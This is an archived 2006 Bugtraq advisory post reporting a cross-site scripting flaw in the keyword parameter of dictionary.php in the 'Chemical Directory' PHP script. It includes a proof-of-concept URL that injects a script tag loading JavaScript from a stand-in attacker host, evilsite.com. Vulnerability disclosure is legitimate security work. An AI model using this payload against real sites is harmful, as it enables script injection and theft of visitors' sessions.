[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Chemical Directory - XSS

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: Chemical Directory - XSS
From: luny@xxxxxxxxxxxxxxx
Date: 8 Jun 2006 00:21:43 -0000

Chemical Directory v.unknown (doesnt say on website) 

Homepage:
http://www.scriptsez.net/ 

Effected files:
dictionary.php

XSS Vulnerability via keyword variable:

http://www.example.com/dictionary.php?action=browse&keyword=e[SCRIPT 
SRC=http://evilsite.com/xss.js][/SCRIPT]

Prev by Date: Babykatmedia.com scripts - vSCAL & vREAL - XSS Vulns
Next by Date: Easy Ad-Manager
Previous by thread: Babykatmedia.com scripts - vSCAL & vREAL - XSS Vulns
Next by thread: Easy Ad-Manager
Index(es):
- Date
- Thread